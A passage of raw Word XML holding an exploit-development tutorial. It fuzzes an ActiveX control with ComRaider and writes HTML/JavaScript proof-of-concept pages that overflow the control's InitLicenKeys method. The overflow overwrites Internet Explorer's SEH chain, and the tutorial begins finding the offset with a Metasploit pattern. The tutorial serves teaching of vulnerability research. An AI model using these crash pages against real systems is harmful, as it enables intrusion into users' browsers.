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57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:t>Start Comraider and click on start.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C43DD" w:rsidRDefault="00D91E57">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="6022858" cy="29481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051474" cy="2962159"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57"/>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:t>Now click on choose active dll or ocx directly and click on next !</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5934601" cy="3767959"/>
            <wp:effectExtent l="19050" t="0" r="899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773673"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now Select the activeX control you want to fuzz !</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5305425" cy="2981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305425" cy="2981325"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57"/>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:t>Comraider provides option to fuzz whole library as well as fuzzing specific member of library.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00D91E57">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="3990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990975"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91E57" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now right click on any member and click on fuzz member</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="36290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98240F" w:rsidRDefault="0098240F"/>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:t>Comraider will generate fuzz scripts after that we can proceed to fuzzing</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="33872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3387230"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now Click on begin fuzzing.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5941058" cy="3810000"/>
            <wp:effectExtent l="19050" t="0" r="254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3811630"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:t>After fuzzing process is completed a list of exceptions will be shown</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="35623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C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Double click on the exception details will show us what kind of error occurred and in this case we have overwritten structured handle exception chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5940339" cy="3457575"/>
            <wp:effectExtent l="19050" t="0" r="326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3459473"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0098240F" w:rsidRDefault="0098240F"/>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:t>Right click and click on test exploit in IE</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C11FF0">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5938580" cy="3209925"/>
            <wp:effectExtent l="19050" t="0" r="50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3212638"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C11FF0" w:rsidRDefault="00C006C1">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Now save the page and let’s view it’s source.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02544" w:rsidRDefault="00E02544">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="23622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98240F" w:rsidRDefault="0098240F"/>
    <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2">
      <w:r>
        <w:t>This is exploit skeleton proposed by comraider and we are going to change it as per our need.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E02544" w:rsidRDefault="00CD6BF2">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="45815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E772C5" w:rsidRDefault="00E772C5" w:rsidP="00E772C5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">I will write the poc in </w:t>
      </w:r>
      <w:r w:rsidR="00D363B3">
        <w:t>javascript (going</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to reinvent the </w:t>
      </w:r>
      <w:r w:rsidR="00D363B3">
        <w:t>wheel: P)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2">
      <w:r>
        <w:t xml:space="preserve">Pretty Simple </w:t>
      </w:r>
      <w:r w:rsidR="00D363B3">
        <w:t xml:space="preserve">Huh?? </w:t>
      </w:r>
      <w:r>
        <w:t>!!</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="00CD6BF2" w:rsidTr="00CD6BF2">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>&lt;object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /&gt;&lt;/object&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>&lt;script language='javascript'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2"/>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>junk="\x41";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>while (junk.length&lt;2068){ junk+=junk;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2"/>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>arg1=junk;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>arg2="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>arg3="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>arg4="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>arg5="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>&lt;/SCRIPT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2" w:rsidP="00CD6BF2">
            <w:r>
              <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00CD6BF2"/>
    <w:p w:rsidR="00CD6BF2" w:rsidRDefault="00645F7A">
      <w:r>
        <w:t xml:space="preserve">It’s time to see the </w:t>
      </w:r>
      <w:r w:rsidR="00D363B3">
        <w:t>crash in action!!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006752CA" w:rsidRDefault="006752CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5676900" cy="38195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676900" cy="3819525"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="006752CA" w:rsidRDefault="006752CA">
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w:rsidR="006752CA" w:rsidRDefault="006752CA">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">As soon as we let the internet explorer execute activeX control  it’s will crash and close. Let’s now take a deeper look, we will attach a debugger with internet explorer and crash it again with same poc script. Open Internet explorer and immunity debugger, press </w:t>
      </w:r>
      <w:r w:rsidRPr="006752CA">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ctrl+F1</w:t>
      </w:r>
      <w:r>
        <w:t>and attach it with internet explorer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006752CA" w:rsidRDefault="006752CA">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="30670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98240F" w:rsidRDefault="0098240F"/>
    <w:p w:rsidR="006752CA" w:rsidRDefault="002C1DC1">
      <w:r>
        <w:t xml:space="preserve">We have to pass several exception and let it continue it’s processing, we can do so by pressing </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1DC1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Ctrl+F9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to pass excetion and only </w:t>
      </w:r>
      <w:r w:rsidRPr="002C1DC1">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>F9</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> to keep process running.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162E90" w:rsidRDefault="00162E90">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="340690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943600" cy="3406906"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00001B90" w:rsidRDefault="001C4E21">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Click on yes!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00162E90" w:rsidRDefault="00001B90">
      <w:r w:rsidRPr="00001B90">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5676900" cy="2457450"/>
            <wp:effectExtent l="1905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676900" cy="2457450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5">
      <w:r>
        <w:t>We are greeted with 41414141 in SEH chain !</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5934075" cy="35242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6752CA" w:rsidRDefault="001704A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="4953000" cy="10287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953000" cy="1028700"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5">
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>The next step is find out how many bytes are required to overwrite the SEH chain. Metasploit’s scripts comes to rescue.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="446722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98240F" w:rsidRDefault="0098240F" w:rsidP="006612A9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1170"/>
        </w:tabs>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001704A5" w:rsidRDefault="006612A9" w:rsidP="006612A9">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="1170"/>
        </w:tabs>
      </w:pPr>
      <w:r>
        <w:t>Now we will use this unique pattern instead of using “A” which will help us find the exact number of bytes to overwrite SEH chain.</w:t>
      </w:r>
      <w:r>
        <w:tab/>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="04A0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="9576"/>
      </w:tblGrid>
      <w:tr w:rsidR="001704A5" w:rsidTr="00936856">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9576" w:type="dxa"/>
          </w:tcPr>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;html&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;object classid='clsid:125C3F0B-1073-4783-9A7B-D33E54269CA5' id='target' /&gt;&lt;/object&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;script language='javascript'&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856"/>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856"/>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>junk="\x41";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>while (junk.length&lt;2068){ junk+=junk;}</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r w:rsidRPr="001704A5">
              <w:t>msp="Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2</w:t>
            </w:r>
            <w:r w:rsidRPr="001704A5">
              <w:lastRenderedPageBreak/>
              <w:t>Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8C";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856"/>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>arg1=msp;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>arg2="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>arg3="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>arg4="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>arg5="TEST";</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>target.InitLicenKeys(arg1 ,arg2 ,arg3 ,arg4 ,arg5 );</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;/SCRIPT&gt;</w:t>
            </w:r>
          </w:p>
          <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="00936856">
            <w:r>
              <w:t>&lt;/BODY&gt;&lt;/HTML&gt;</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w:rsidR="001704A5" w:rsidRDefault="001704A5" w:rsidP="001704A5"/>
    <w:p w:rsidR="00911AEC" w:rsidRDefault="00911AEC">
      <w:r>
        <w:t>Restart Internet explorer from debugger by pressing Ctrl+F2 and open our PoC file. Notice the value of SEH chain.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0011786B" w:rsidRDefault="0011786B">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="2371725" cy="11620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371725" cy="1162050"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln w="9525">
                      <a:noFill/>
                      <a:miter lim="800000"/>
                      <a:headEnd/>
                      <a:tailEnd/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D962FF" w:rsidRDefault="00D962FF"/>
